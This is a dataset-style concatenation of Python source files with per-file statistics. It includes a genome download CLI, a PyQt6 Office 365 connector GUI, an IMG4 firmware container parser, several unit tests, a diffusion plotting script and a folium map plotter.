mapping taxa to the download genome fasta file is written to STDOUT """ # import import sys,os import logging ## batteries from docopt import docopt from MGSIM import Genome_Download ## logging logging.basicConfig(format='%(asctime)s - %(message)s', level=logging.DEBUG) # opt parse
28.770492
85
0.631339
#!/usr/bin/env python """ genome_download: downloading genomes Usage: genome_download [options] <accession_table> genome_download -h | --help genome_download --version Options: <accessin_table> Taxon-accession table (see Description). Use '-' if from STDIN. -d=<d> Output directory. [Default: .] -e=<e> Email to use for NCBI queries. [Default: blank@gmail.com] -a=<a> Number of ambiguous nucleotides allowed in a genome. [Default: 0] -n=<n> Number of cpus. [Default: 1] -t=<t> Number of tries to download genomes. [Default: 10] -r Rename genome sequences based on taxon name? --debug Debug mode (no multiprocessing). -h --help Show this screen. --version Show version. Description: Taxon-accession table --------------------- * tab-delimited * must contain 2 columns * "Taxon" = taxon name * "Accession" = NCBI accession used for downloading * Possible accessions: * ncbi nucleotide db * ncbi assembly db * ftp url to genome (direct download) * other columns are allowed Output ------ * Genome fasta files written to the specified output directory * A table mapping taxa to the download genome fasta file is written to STDOUT """ # import import sys,os import logging ## batteries from docopt import docopt from MGSIM import Genome_Download ## logging logging.basicConfig(format='%(asctime)s - %(message)s', level=logging.DEBUG) # opt parse def opt_parse(args=None): if args is None: args = docopt(__doc__, version='0.1') else: args = docopt(__doc__, version='0.1', argv=args) Genome_Download.main(args)
177
0
22
6c2d37e74fbca6fb979828a56b8838b574e1ca73
6,460
py
Python
Interface/app.py
BrandonLawler/Office-365-Connector
2421c560cfbc517a1074c7fdbda916c842e2995d
[ "MIT" ]
null
null
null
Interface/app.py
BrandonLawler/Office-365-Connector
2421c560cfbc517a1074c7fdbda916c842e2995d
[ "MIT" ]
null
null
null
Interface/app.py
BrandonLawler/Office-365-Connector
2421c560cfbc517a1074c7fdbda916c842e2995d
[ "MIT" ]
null
null
null
import logging import multiprocessing from typing import MutableMapping from PyQt6.QtCore import * from PyQt6.QtWidgets import * from Core.messages import Courier, Message from .widgets import * import os, sys
35.108696
140
0.636223
import logging import multiprocessing from typing import MutableMapping from PyQt6.QtCore import * from PyQt6.QtWidgets import * from Core.messages import Courier, Message from .widgets import * import os, sys class App: _TITLE = 'Office 365 Connector' _MEDIA_PATH = f"{os.getcwd()}\\Interface\\media" _WINDOW_HEIGHT = 600 _WINDOW_WIDTH = 860 _LOADING_WINDOW_HEIGHT = 80 _LOADING_WINDOW_WIDTH = 60 _INITIALISATION_CHECKS = [ "Initialising Exchange Online", "Initialising Microsoft 365 Online" ] _STAGE_INITIALISATION = 0 _STAGE_DISCONNECTED = 1 def __init__(self, process_event: multiprocessing.Event, shutdown_event: multiprocessing.Event, courier: Courier): self._logger = multiprocessing.get_logger() # self._logger.setLevel(logging.DEBUG) self._logger.addHandler(logging.StreamHandler()) self._process_event = process_event self._shutdown_event = shutdown_event self._courier = courier self._courier.send("Core", "PID", os.getpid()) self._mainframe = None self._body = None self._body_frame = None self._customization = None self._mode = 0 self._movie = None self._loading_label = None self._loading_bar = None self._shutdown_timer = QTimer() self._shutdown_timer.timeout.connect(self._shutdown_application) self._shutdown_timer.setInterval(1000) self._message_timer = QTimer() self._message_timer.timeout.connect(self._message_process) self._message_timer.setInterval(100) self._initialise() self._build() self._courier.send("O365", "Initialise") self.start() def _shutdown(self): self._logger.info("PyQt Application Shutting Down") self._shutdown_event.set() while not self._process_event.is_set(): pass def _shutdown_application(self): if self._process_event.is_set(): self._logger.info("Externally Shutting Down Application") self._application.quit() def _message_process(self): message = self._courier.receive() if message is not None: if message.type == "Initalise": if type(message.content) is int: self._loading_bar.setValue(message.content) if message.content == self._INITIALISATION_CHECKS.__len__(): self._mode = self._STAGE_DISCONNECTED self._window.resize(self._WINDOW_WIDTH, self._WINDOW_HEIGHT) else: self._loading_label.setText(self._INITIALISATION_CHECKS[message.content-1]) else: raise Exception("Unable to Initialise PowerShell Modules") elif message.type == "Check Customization": self._customization = message.content def _initialise(self): self._application = QApplication([]) self._window = MainWindow(self._shutdown) self._window.setWindowTitle(self._TITLE) self._window.setMinimumSize(self._WINDOW_WIDTH, self._WINDOW_HEIGHT) self._window.setMaximumSize(self._WINDOW_WIDTH, self._WINDOW_HEIGHT) self._mainframe = QFrame() self._window.setCentralWidget(self._mainframe) def _build_variable_display(self, *args, horizontal=False, vertical=False, grid=False): frame_container = Widget() if horizontal: frame = QHBoxLayout(frame_container) elif vertical: frame = QVBoxLayout(frame_container) frame.setAlignment(Qt.AlignmentFlag.AlignCenter) elif grid: frame = QGridLayout(frame_container) else: raise ValueError("Invalid Layout Type: Horizontal, Vertical or Grid input must be specified") frame.setSpacing(0) frame.setContentsMargins(10, 0, 10, 10) for arg in args: if grid: try: widget, row, column, rsize, csize = arg frame.addWidget(widget, row, column, rsize, csize) except: raise ValueError("Invalid Grid Layout: Must be (Widget, row, column, row_size, column_size)") else: if vertical: arg.setAlignment(Qt.AlignmentFlag.AlignCenter) frame.addWidget(arg) return frame_container def _build(self): self._mainframe.setLayout(QVBoxLayout()) self._mainframe.layout().addWidget(self._build_header()) self._mainframe.layout().addWidget(self._build_body()) self._mainframe.layout().addWidget(self._build_footer()) def _build_loading_frame(self, message): self._logger.debug("Building Loading Frame") self._movie = Movie(f"{self._MEDIA_PATH}\\loading_icon.gif", 120) loading_movie = Label("") loading_movie.setMovie(self._movie) loading_label = Label(message) self._loading_bar = ProgressBar(0, self._INITIALISATION_CHECKS.__len__()) return self._build_variable_display(loading_movie, loading_label, self._loading_bar, vertical=True, horizontal=False, grid=False) def _build_initialisation(self): self._window.resize(self._LOADING_WINDOW_WIDTH, self._LOADING_WINDOW_HEIGHT) return self._build_loading_frame("Initialising PowerShell Modules") def _build_header(self): header = QFrame() header.setLayout(QHBoxLayout()) return header def _build_body(self): self._body = QFrame() self._body.setLayout(QVBoxLayout()) if self._body_frame is not None: self._body_frame.hide() if self._mode == self._STAGE_INITIALISATION: self._body_frame = self._build_initialisation() self._body.layout().addWidget(self._body_frame) return self._body def _build_footer(self): footer = QFrame() footer.setLayout(QHBoxLayout()) # footer.layout().addWidget(self._build_version()) # footer.layout().addWidget(self._build_copyright()) return footer def start(self): self._window.show() if self._movie is not None: self._movie.start() self._shutdown_timer.start() sys.exit(self._application.exec())
5,460
766
23
69cc9a1f6a639563622f0c9fe9107b2a2258bf9f
6,079
py
Python
img4.py
clayfreeman/img4
e2d8f05ca5ba4c9d445dff5f8a6b3b4cf48d3bf2
[ "MIT" ]
null
null
null
img4.py
clayfreeman/img4
e2d8f05ca5ba4c9d445dff5f8a6b3b4cf48d3bf2
[ "MIT" ]
null
null
null
img4.py
clayfreeman/img4
e2d8f05ca5ba4c9d445dff5f8a6b3b4cf48d3bf2
[ "MIT" ]
null
null
null
# SPDX-License-Identifier: MIT # Greetings to: # - https://www.theiphonewiki.com/wiki/IMG4_File_Format # - https://github.com/tihmstar/img4tool/ # - https://lapo.it/asn1js/ # - hexdump tool of choice import functools from asn1crypto.core import ( Enumerated, Choice, Sequence, SequenceOf, SetOf, Integer, IA5String, OctetString, ParsableOctetString, Integer, Any ) from asn1crypto.x509 import Certificate import restruct class any_tag(tuple): """ highly cursed tuple subtype to bully asn1crypto into accepting any tag """ if __name__ == '__main__': import argparse parser = argparse.ArgumentParser() parser.add_argument('-r', '--raw', action='store_true', help='print raw parsed data') parser.add_argument('infile', type=argparse.FileType('rb'), help='input .img4/.im4m/.im4p file') parser.add_argument('outfile', type=argparse.FileType('wb'), nargs='?', help='output data file for payload') args = parser.parse_args() contents = args.infile.read() errors = {} for p in (IMG4, IMG4Manifest, IMG4Payload): try: img4 = p.load(contents) img4.native # trigger parsing break except Exception as e: errors[p] = e else: print('Could not parse file {}:'.format(args.infile.name)) for (p, e) in errors.items(): print(' - As {}: {}'.format(p.__name__, e)) sys.exit(1) if isinstance(img4, IMG4): payload = img4['payload'] manifest = img4['manifest'] elif isinstance(img4, IMG4Manifest): payload = None manifest = img4 elif isinstance(img4, IMG4Payload): payload = img4 manifest = None if payload: p = payload.native if args.raw: print(restruct.format_value(p, str)) else: print('payload:') print(' type:', p['type']) print(' desc:', p['description']) if p['keybags']: print(' keybags:') keybags = payload['keybags'].parse(IMG4KeyBagSequence).native for kb in keybags: print(' id: ', kb['id']) print(' iv: ', restruct.format_value(kb['iv'], str)) print(' key:', restruct.format_value(kb['key'], str)) print() if p['compression']: print(' compression:') print(' algo:', p['compression']['algorithm']) print(' size:', p['compression']['original_size']) algo = p['compression']['algorithm'] else: algo = None print() if args.outfile: if algo == 'lzfse': import lzfse data = lzfse.decompress(p['data']) elif algo: raise ValueError('unknown algorithm: {}'.format(algo)) else: data = p['data'] args.outfile.write(data) if manifest: m = manifest.native if args.raw: print(restruct.format_value(m, str)) else: print('manifest:') for p in m['contents']: print(' body:') if p['type'] == 'MANB': for c in p['categories']: cname = c['category']['type'] for v in c['category']['values']: print(' {}.{}: {}'.format(cname, v['value']['key'], restruct.format_value(v['value']['value'], str))) print()
29.225962
132
0.550584
# SPDX-License-Identifier: MIT # Greetings to: # - https://www.theiphonewiki.com/wiki/IMG4_File_Format # - https://github.com/tihmstar/img4tool/ # - https://lapo.it/asn1js/ # - hexdump tool of choice import functools from asn1crypto.core import ( Enumerated, Choice, Sequence, SequenceOf, SetOf, Integer, IA5String, OctetString, ParsableOctetString, Integer, Any ) from asn1crypto.x509 import Certificate import restruct def ascii2int(s): return int.from_bytes(s.encode('ascii'), byteorder='big') class any_tag(tuple): """ highly cursed tuple subtype to bully asn1crypto into accepting any tag """ def __contains__(self, o): return True class IMG4KeyBag(Sequence): _fields = [ ('id', Integer), ('iv', OctetString), ('key', OctetString), ] class IMG4KeyBagSequence(SequenceOf): _child_spec = IMG4KeyBag class IMG4CompressionAlgorithm(Integer): _map = { 1: 'lzfse', } class IMG4Compression(Sequence): _fields = [ ('algorithm', IMG4CompressionAlgorithm), ('original_size', Integer), ] class IMG4Payload(Sequence): _fields = [ ('magic', IA5String), # "IM4P" ('type', IA5String), ('description', IA5String), ('data', OctetString, {'optional': True}), ('keybags', ParsableOctetString, {'optional': True}), ('compression', IMG4Compression, {'optional': True}), ] class AnyValueInner(Sequence): _fields = [ ('key', IA5String), ('value', Any, {'optional': True}), ] class AnyValue(Sequence): _fields = [ ('value', AnyValueInner), ] class_ = 3 _bad_tag = any_tag() class AnySet(SetOf): _child_spec = AnyValue class IMG4ManifestProperties(Sequence): _fields = [ ('type', IA5String), # "MANP", ('values', AnySet) ] class IMG4ManifestCategory(Sequence): _fields = [ ('category', IMG4ManifestProperties) ] class_ = 3 _bad_tag = any_tag() class IMG4ManifestCategorySet(SetOf): _child_spec = IMG4ManifestCategory class IMG4ManifestBody(Sequence): _fields = [ ('type', IA5String), # "MANB" ('categories', IMG4ManifestCategorySet), ] class IMG4ManifestContent(Choice): _alternatives = [ ('category', IMG4ManifestBody, {'explicit': ('private', ascii2int('MANB'))}), ] class IMG4ManifestContentSet(SetOf): _child_spec = IMG4ManifestContent class IMG4CertificateSequence(SequenceOf): _child_spec = Certificate class IMG4Manifest(Sequence): _fields = [ ('magic', IA5String), # "IM4M" ('version', Integer), ('contents', IMG4ManifestContentSet), ('signature', OctetString), ('certificates', IMG4CertificateSequence), ] class IMG4(Sequence): _fields = [ ('magic', IA5String), # "IMG4", ('payload', IMG4Payload), ('manifest', IMG4Manifest, {'explicit': 0}), ] if __name__ == '__main__': import argparse parser = argparse.ArgumentParser() parser.add_argument('-r', '--raw', action='store_true', help='print raw parsed data') parser.add_argument('infile', type=argparse.FileType('rb'), help='input .img4/.im4m/.im4p file') parser.add_argument('outfile', type=argparse.FileType('wb'), nargs='?', help='output data file for payload') args = parser.parse_args() contents = args.infile.read() errors = {} for p in (IMG4, IMG4Manifest, IMG4Payload): try: img4 = p.load(contents) img4.native # trigger parsing break except Exception as e: errors[p] = e else: print('Could not parse file {}:'.format(args.infile.name)) for (p, e) in errors.items(): print(' - As {}: {}'.format(p.__name__, e)) sys.exit(1) if isinstance(img4, IMG4): payload = img4['payload'] manifest = img4['manifest'] elif isinstance(img4, IMG4Manifest): payload = None manifest = img4 elif isinstance(img4, IMG4Payload): payload = img4 manifest = None if payload: p = payload.native if args.raw: print(restruct.format_value(p, str)) else: print('payload:') print(' type:', p['type']) print(' desc:', p['description']) if p['keybags']: print(' keybags:') keybags = payload['keybags'].parse(IMG4KeyBagSequence).native for kb in keybags: print(' id: ', kb['id']) print(' iv: ', restruct.format_value(kb['iv'], str)) print(' key:', restruct.format_value(kb['key'], str)) print() if p['compression']: print(' compression:') print(' algo:', p['compression']['algorithm']) print(' size:', p['compression']['original_size']) algo = p['compression']['algorithm'] else: algo = None print() if args.outfile: if algo == 'lzfse': import lzfse data = lzfse.decompress(p['data']) elif algo: raise ValueError('unknown algorithm: {}'.format(algo)) else: data = p['data'] args.outfile.write(data) if manifest: m = manifest.native if args.raw: print(restruct.format_value(m, str)) else: print('manifest:') for p in m['contents']: print(' body:') if p['type'] == 'MANB': for c in p['categories']: cname = c['category']['type'] for v in c['category']['values']: print(' {}.{}: {}'.format(cname, v['value']['key'], restruct.format_value(v['value']['value'], str))) print()
83
1,958
440
608146772a2f2ce45897b6339cbe785cf26ad687
2,548
py
Python
test/programytest/storage/stores/nosql/mongo/dao/test_rdf.py
cdoebler1/AIML2
ee692ec5ea3794cd1bc4cc8ec2a6b5e5c20a0d6a
[ "MIT" ]
345
2016-11-23T22:37:04.000Z
2022-03-30T20:44:44.000Z
test/programytest/storage/stores/nosql/mongo/dao/test_rdf.py
MikeyBeez/program-y
00d7a0c7d50062f18f0ab6f4a041068e119ef7f0
[ "MIT" ]
275
2016-12-07T10:30:28.000Z
2022-02-08T21:28:33.000Z
test/programytest/storage/stores/nosql/mongo/dao/test_rdf.py
VProgramMist/modified-program-y
f32efcafafd773683b3fe30054d5485fe9002b7d
[ "MIT" ]
159
2016-11-28T18:59:30.000Z
2022-03-20T18:02:44.000Z
import unittest from programy.storage.stores.nosql.mongo.dao.rdf import RDF
43.931034
132
0.619702
import unittest from programy.storage.stores.nosql.mongo.dao.rdf import RDF class RDFTests(unittest.TestCase): def test_init_no_id(self): rdf = RDF(name="TEST", subject="subj", predicate="pred", obj="obj") self.assertIsNotNone(rdf) self.assertIsNone(rdf.id) self.assertEqual("TEST", rdf.name) self.assertEqual("subj", rdf.subject) self.assertEqual("pred", rdf.predicate) self.assertEqual("obj", rdf.object) self.assertEqual({'name': 'TEST', 'object': 'obj', 'predicate': 'pred', 'subject': 'subj'}, rdf.to_document()) def test_init_with_id(self): rdf = RDF(name="TEST", subject="subj", predicate="pred", obj="obj") rdf.id = '666' self.assertIsNotNone(rdf) self.assertIsNotNone(rdf.id) self.assertEqual('666', rdf.id) self.assertEqual("TEST", rdf.name) self.assertEqual("subj", rdf.subject) self.assertEqual("pred", rdf.predicate) self.assertEqual("obj", rdf.object) self.assertEqual({'_id': '666', 'name': 'TEST', 'object': 'obj', 'predicate': 'pred', 'subject': 'subj'}, rdf.to_document()) def test_from_document_no_id(self): rdf1 = RDF.from_document({'name': 'TEST', 'object': 'obj', 'predicate': 'pred', 'subject': 'subj'}) self.assertIsNotNone(rdf1) self.assertIsNone(rdf1.id) self.assertEqual("TEST", rdf1.name) self.assertEqual("subj", rdf1.subject) self.assertEqual("pred", rdf1.predicate) self.assertEqual("obj", rdf1.object) def test_from_document_with_id(self): rdf2 = RDF.from_document({'_id': '666', 'name': 'TEST', 'object': 'obj', 'predicate': 'pred', 'subject': 'subj'}) self.assertIsNotNone(rdf2) self.assertIsNotNone(rdf2.id) self.assertEqual('666', rdf2.id) self.assertEqual("TEST", rdf2.name) self.assertEqual("subj", rdf2.subject) self.assertEqual("pred", rdf2.predicate) self.assertEqual("obj", rdf2.object) def test_repr_no_id(self): rdf1 = RDF.from_document({'name': 'TEST', 'object': 'obj', 'predicate': 'pred', 'subject': 'subj'}) self.assertEquals("<RDF(id='n/a', name='TEST', subject='subj', predicate='pred', object='obj')>", str(rdf1)) def test_repr_with_id(self): rdf2 = RDF.from_document({'_id': '666', 'name': 'TEST', 'object': 'obj', 'predicate': 'pred', 'subject': 'subj'}) self.assertEquals("<RDF(id='666', name='TEST', subject='subj', predicate='pred', object='obj')>", str(rdf2))
2,272
13
185
9f9edf6016950ee307ec6bab15c4f6306ef09f36
2,328
py
Python
scripts/pughpore/plot_diff_ahem.py
jhwnkim/nanopores
98b3dbb5d36464fbdc03f59d224d38e4255324ce
[ "MIT" ]
null
null
null
scripts/pughpore/plot_diff_ahem.py
jhwnkim/nanopores
98b3dbb5d36464fbdc03f59d224d38e4255324ce
[ "MIT" ]
null
null
null
scripts/pughpore/plot_diff_ahem.py
jhwnkim/nanopores
98b3dbb5d36464fbdc03f59d224d38e4255324ce
[ "MIT" ]
null
null
null
# (c) 2017 Gregor Mitscha-Baude from matplotlib import pyplot as plt import numpy as np import dolfin from nanopores.tools import fields fields.set_dir_dropbox() from nanopores.models.nanopore import Setup from nanopores.geometries.alphahempoly import poly from nanopores.geometries.alphahem import default from nanopores.geometries.cylpore import Pore, get_geo from nanopores.models.diffusion_ahem import diff_profile_z_ahem, get_diffusivity # params for precomputed diffusivity params = dict(dim=2, Nmax=1e5, h=.5, ahemqsuniform=True, rMolecule=0.11) #ap1 = 18 #ap2 = 49 #x0 = poly[18] #x1 = poly[49] # #zmem = .5*(x0[1] + x1[1]) #print zmem # #poly = [[x[0], x[1] - zmem] for x in poly] #proteincs = [z - zmem for z in default["proteincs"]] #cs = [z - zmem for z in default["cs"]] #default.update(zmem=0., hmem=2.82, Htop=10, Hbot=6, R=6, proteincs=proteincs, cs=cs) #print default # #def new_get_geo(**params): # return get_geo(poly, **params) # #p = Pore(poly, **default) #p.build(h=.5) # #p.polygons["alphahem"].plot("ok") #p.polygons["membrane"].plot() #p.polygons["bulkfluid_top"].plot() #p.polygons["bulkfluid_bottom"].plot() #plt.show() #setup = Setup(get_geo=new_get_geo, geop=default, h=.5) #setup = Setup(h=.5) #setup.geo.plot_boundaries() functions, mesh = fields.get_functions(name="Dalphahem-coupled", **params) dist = functions["dist"] #dolfin.plot(dist, interactive=True) # construct D fit from Noskov2004 and plot tabulated D values A = 0.64309 B = 0.00044 C = 0.06894 D = 0.35647 E = 0.19409 z, D = diff_profile_fit(a=-12, b=2, N=100) plt.plot(z, D, "-b", label="Tabulated (infinite cylinder)") data = diff_profile_z_ahem(a=-12, b=2, N=100, **params) z = [x0[2] for x0 in data["x"]] Dz = data["D"] plt.plot(z, Dz, "og", label="Full hydrodynamic model") plt.ylabel("Rel. diffusivity") plt.xlabel("z [nm]") plt.xlim(-10, 0) ax = plt.gca() #ax.yaxis.tick_right() #ax.yaxis.set_label_position("right") plt.legend(loc="upper left", frameon=False) from nanopores import savefigs from folders import FIGDIR savefigs("Dz", FIGDIR + "/ahem", (6, 4.5)) #print results
27.388235
85
0.693299
# (c) 2017 Gregor Mitscha-Baude from matplotlib import pyplot as plt import numpy as np import dolfin from nanopores.tools import fields fields.set_dir_dropbox() from nanopores.models.nanopore import Setup from nanopores.geometries.alphahempoly import poly from nanopores.geometries.alphahem import default from nanopores.geometries.cylpore import Pore, get_geo from nanopores.models.diffusion_ahem import diff_profile_z_ahem, get_diffusivity # params for precomputed diffusivity params = dict(dim=2, Nmax=1e5, h=.5, ahemqsuniform=True, rMolecule=0.11) #ap1 = 18 #ap2 = 49 #x0 = poly[18] #x1 = poly[49] # #zmem = .5*(x0[1] + x1[1]) #print zmem # #poly = [[x[0], x[1] - zmem] for x in poly] #proteincs = [z - zmem for z in default["proteincs"]] #cs = [z - zmem for z in default["cs"]] #default.update(zmem=0., hmem=2.82, Htop=10, Hbot=6, R=6, proteincs=proteincs, cs=cs) #print default # #def new_get_geo(**params): # return get_geo(poly, **params) # #p = Pore(poly, **default) #p.build(h=.5) # #p.polygons["alphahem"].plot("ok") #p.polygons["membrane"].plot() #p.polygons["bulkfluid_top"].plot() #p.polygons["bulkfluid_bottom"].plot() #plt.show() #setup = Setup(get_geo=new_get_geo, geop=default, h=.5) #setup = Setup(h=.5) #setup.geo.plot_boundaries() functions, mesh = fields.get_functions(name="Dalphahem-coupled", **params) dist = functions["dist"] #dolfin.plot(dist, interactive=True) # construct D fit from Noskov2004 and plot tabulated D values A = 0.64309 B = 0.00044 C = 0.06894 D = 0.35647 E = 0.19409 def Dfit(z, rion=0.11): rpore = dist([0., z]) beta = rion/rpore return 1./(A + B*np.exp(beta/C) + D*np.exp(beta/E)) def diff_profile_fit(a=-10.3, b=0.05, N=20): Z = np.linspace(a, b, N) return Z, [Dfit(z) for z in Z] z, D = diff_profile_fit(a=-12, b=2, N=100) plt.plot(z, D, "-b", label="Tabulated (infinite cylinder)") data = diff_profile_z_ahem(a=-12, b=2, N=100, **params) z = [x0[2] for x0 in data["x"]] Dz = data["D"] plt.plot(z, Dz, "og", label="Full hydrodynamic model") plt.ylabel("Rel. diffusivity") plt.xlabel("z [nm]") plt.xlim(-10, 0) ax = plt.gca() #ax.yaxis.tick_right() #ax.yaxis.set_label_position("right") plt.legend(loc="upper left", frameon=False) from nanopores import savefigs from folders import FIGDIR savefigs("Dz", FIGDIR + "/ahem", (6, 4.5)) #print results
193
0
46
a417f4cdb25dac12c25d28f2f1b5f38a475ca13e
320
py
Python
codewars/src/multiples_digits_sum.py
wenima/math-series
60aa0b0c845bd859a1bf936c7e200f60ecfce026
[ "MIT" ]
null
null
null
codewars/src/multiples_digits_sum.py
wenima/math-series
60aa0b0c845bd859a1bf936c7e200f60ecfce026
[ "MIT" ]
null
null
null
codewars/src/multiples_digits_sum.py
wenima/math-series
60aa0b0c845bd859a1bf936c7e200f60ecfce026
[ "MIT" ]
1
2019-10-03T07:38:06.000Z
2019-10-03T07:38:06.000Z
"""This module solves kata https://www.codewars.com/kata/multiples-and-digit-sums/train/python.""" def procedure(i): """Return an integer derived by first finding all multiples of i up to 100, then summing all up digit sums of all multiples.""" return sum(int(d) for i in range(n, 101, n) for d in str(i))
40
98
0.7
"""This module solves kata https://www.codewars.com/kata/multiples-and-digit-sums/train/python.""" def procedure(i): """Return an integer derived by first finding all multiples of i up to 100, then summing all up digit sums of all multiples.""" return sum(int(d) for i in range(n, 101, n) for d in str(i))
0
0
0
36e541780526915a358b17b1f29530895478a06a
1,869
py
Python
tests/show_drive.py
jmscslgroup/privpurge
f21fa1e05c5e15ea9ed3b3f720aabb151afcc51e
[ "BSD-2-Clause" ]
null
null
null
tests/show_drive.py
jmscslgroup/privpurge
f21fa1e05c5e15ea9ed3b3f720aabb151afcc51e
[ "BSD-2-Clause" ]
4
2021-04-12T17:58:41.000Z
2021-08-01T12:35:57.000Z
tests/show_drive.py
jmscslgroup/privpurge
f21fa1e05c5e15ea9ed3b3f720aabb151afcc51e
[ "BSD-2-Clause" ]
null
null
null
import json import folium import folium.plugins import tempfile import os import re import argparse if __name__ == "__main__": cwd = os.getcwd() args = get_args() plot_privpurge( os.path.join(cwd, args.zonefile), os.path.join(cwd, args.directory), filename=args.output, )
26.7
86
0.579989
import json import folium import folium.plugins import tempfile import os import re def plot_privpurge(message, outdir, filename=None): if filename is None: filename = "~map_" + next(tempfile._get_candidate_names()) + ".html" my_map = folium.Map() for fl in [ f for f in os.listdir(outdir) if os.path.isfile(os.path.join(outdir, f)) ]: if re.search(r".{37}_GPS_Messages.csv", fl): with open(os.path.join(os.getcwd(), os.path.join(outdir, fl))) as f: f.readline() points = [ tuple(map(float, l.split(",")[2:4][::-1])) for l in f.readlines() ] folium.vector_layers.PolyLine(points).add_to(my_map) data = json.load(open(os.path.join(os.getcwd(), message))) for region in data["regions"]: if region["type"] == "circle": lon, lat = region["data"]["center"] rad = region["data"]["radius"] folium.vector_layers.Circle( location=[lat, lon], radius=rad, color="#3186cc", fill_color="#3186cc" ).add_to(my_map) elif region["type"] == "polygon": dat = [(lat, lon) for lon, lat in region["data"]] folium.vector_layers.Polygon( locations=dat, color="#3186cc", fill_color="#3186cc" ).add_to(my_map) my_map.save(filename) print(f"Map saved to: {filename}") import argparse def get_args(): parser = argparse.ArgumentParser() parser.add_argument("directory") parser.add_argument("zonefile") parser.add_argument("-o", "--output") return parser.parse_args() if __name__ == "__main__": cwd = os.getcwd() args = get_args() plot_privpurge( os.path.join(cwd, args.zonefile), os.path.join(cwd, args.directory), filename=args.output, )
1,503
0
46
b5646fff9a5543547a5f966f926aa2fd063a36b3
8,249
py
Python
autopycoin/utils/data_utils_test.py
AutocoinLab/autopycoin
d091292517c3429d5cc2dfeb513c644b506af9cf
[ "Apache-2.0" ]
3
2021-09-26T14:04:25.000Z
2022-02-10T09:52:00.000Z
autopycoin/utils/data_utils_test.py
AutocoinLab/autopycoin
d091292517c3429d5cc2dfeb513c644b506af9cf
[ "Apache-2.0" ]
24
2021-09-26T14:04:27.000Z
2022-02-11T13:32:06.000Z
autopycoin/utils/data_utils_test.py
AutocoinLab/autopycoin
d091292517c3429d5cc2dfeb513c644b506af9cf
[ "Apache-2.0" ]
null
null
null
# pylint: skip-file """ Unit test for data utils functions. """ import numpy as np import pandas as pd import pytest import tensorflow as tf from tensorflow import test from .data_utils import quantiles_handler, example_handler, fill_none from ..data import random_ts from ..dataset import WindowGenerator @pytest.fixture(scope="class") @pytest.mark.usefixtures("prepare_data") @pytest.mark.usefixtures("prepare_data")
30.439114
88
0.534731
# pylint: skip-file """ Unit test for data utils functions. """ import numpy as np import pandas as pd import pytest import tensorflow as tf from tensorflow import test from .data_utils import quantiles_handler, example_handler, fill_none from ..data import random_ts from ..dataset import WindowGenerator class CheckQuantileTest(test.TestCase): def test_nested_quantiles(self): quantiles = [[0.1, 0.1], [3.0, 0.7]] self.assertEqual([[0.1], [0.03, 0.7]], quantiles_handler(quantiles)) quantiles = [0.1, 0.1] self.assertEqual([[0.1]], quantiles_handler(quantiles)) def test_float_quantile(self): quantiles = 0.1 self.assertEqual([[0.1]], quantiles_handler(quantiles)) def test_int_quantile(self): quantiles = 1 self.assertEqual([[0.01]], quantiles_handler(quantiles)) def test_none_quantile(self): quantiles = [1, None] with self.assertRaisesRegexp( ValueError, "None value or empty list are not supported" ): self.assertEqual([[0.1]], quantiles_handler(quantiles)) @pytest.fixture(scope="class") def prepare_data(request): data = random_ts( n_steps=400, trend_degree=2, periods=[10], fourier_orders=[10], trend_mean=0, trend_std=1, seasonality_mean=0, seasonality_std=1, batch_size=1, n_variables=1, noise=True, seed=42, ) request.cls.data = pd.DataFrame(data[0].numpy(), columns=["test"]) request.cls.w = WindowGenerator( input_width=50, label_width=20, shift=20, test_size=10, valid_size=10, flat=True, batch_size=32, ) request.cls.w = request.cls.w.from_array( data=request.cls.data, input_columns=["test"], label_columns=["test"], ) request.cls.w2 = WindowGenerator( input_width=50, label_width=20, shift=20, test_size=10, valid_size=10, flat=True, batch_size=32, ) request.cls.w2 = request.cls.w2.from_array( data=request.cls.data, input_columns=["test"], label_columns=["test"], date_columns=["test"], ) @pytest.mark.usefixtures("prepare_data") class ExampleHandlerTest(test.TestCase): def test_shape(self): """ Dataset and tuple shapes are not handled. """ outputs = example_handler(self.w.train, self.w) self.assertEqual( ( [output if output is None else output.shape for output in outputs[0]] + [outputs[1].shape] ), [tf.TensorShape([32, 50]), None, None, None, tf.TensorShape([32, 20]),], ) outputs = example_handler(self.w.test, self.w) self.assertEqual( ( [output if output is None else output.shape for output in outputs[0]] + [outputs[1].shape] ), [tf.TensorShape([10, 50]), None, None, None, tf.TensorShape([10, 20]),], ) outputs = example_handler(self.w.valid, self.w) self.assertEqual( ( [output if output is None else output.shape for output in outputs[0]] + [outputs[1].shape] ), [tf.TensorShape([10, 50]), None, None, None, tf.TensorShape([10, 20]),], ) outputs = example_handler(self.w.production(self.data, None), self.w) self.assertEqual( ( [output if output is None else output.shape for output in outputs[0]] + [outputs[1].shape] ), [tf.TensorShape([1, 50]), None, None, None, tf.TensorShape([1, 20]),], ) # example_handler doesn't affect tuple inputs with good shape tensor = (tf.constant([0.0]), tf.constant([0.0])) outputs = example_handler(tensor, self.w) self.assertEqual( ( [output if output is None else output.shape for output in outputs[0]] + [outputs[1].shape] ), [tf.TensorShape([1]), None, None, None, tf.TensorShape([1])], ) def test_dtype(self): """ Dataset dtypes are effectively turned into desired dtypes. tuple with good types is not handled. """ outputs = example_handler(self.w2.train, self.w2) self.assertEqual( ( [output if output is None else output.dtype for output in outputs[0]] + [outputs[1].dtype] ), [tf.float32, None, np.dtype("<U3"), np.dtype("<U3"), tf.float32], ) outputs = example_handler(self.w2.test, self.w2) self.assertEqual( ( [output if output is None else output.dtype for output in outputs[0]] + [outputs[1].dtype] ), [tf.float32, None, np.dtype("<U3"), np.dtype("<U3"), tf.float32], ) outputs = example_handler(self.w2.valid, self.w2) self.assertEqual( ( [output if output is None else output.dtype for output in outputs[0]] + [outputs[1].dtype] ), [tf.float32, None, np.dtype("<U3"), np.dtype("<U3"), tf.float32], ) outputs = example_handler(self.w2.production(self.data, None), self.w2) self.assertEqual( ( [output if output is None else output.dtype for output in outputs[0]] + [outputs[1].dtype] ), [tf.float32, None, np.dtype("<U3"), np.dtype("<U3"), tf.float32], ) # example_handler doesn't affect tuple inputs with good -types tensor = ( ( tf.constant([0.0]), np.array(["0"], dtype="<U2"), np.array(["0"], dtype="<U2"), ), tf.constant([0.0]), ) outputs = example_handler(tensor, self.w2) self.assertEqual( ( [output if output is None else output.dtype for output in outputs[0]] + [outputs[1].dtype] ), [tf.float32, None, np.dtype("<U2"), np.dtype("<U2"), tf.float32], ) def test_raise(self): """ inputs shape or type is not respected. """ # list and not tuple with self.assertRaises(ValueError): tensor = [tf.constant([0.0]), tf.constant([0.0])] example_handler(tensor, self.w) # bad inputs shape with self.assertRaises(ValueError): tensor = ( ( tf.constant([0]), 